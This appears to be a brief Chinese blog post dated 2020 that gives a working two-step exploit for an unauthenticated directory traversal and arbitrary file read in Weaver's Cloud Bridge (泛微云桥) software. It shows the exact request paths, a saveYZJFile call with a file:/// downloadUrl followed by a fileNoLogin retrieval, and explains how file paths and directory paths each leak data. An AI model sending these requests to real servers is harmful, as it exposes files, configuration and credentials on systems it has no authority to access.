泛微云桥目录遍历+任意文件读取 最新

上一篇文章:泛微云桥任意文件读取漏洞

利用方式:

第一步:

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt  

第二步:

/file/fileNoLogin/id

注:

downloadUrl参数填写文件的绝对路径时,可以造成任意文件读取;

downloadUrl参数填写目录的绝对路径时,可以造成目录遍历。

 

 

 

 

posted @ 2020-09-13 21:35  r1ch4rd_L  阅读(1424)  评论(0编辑  收藏  举报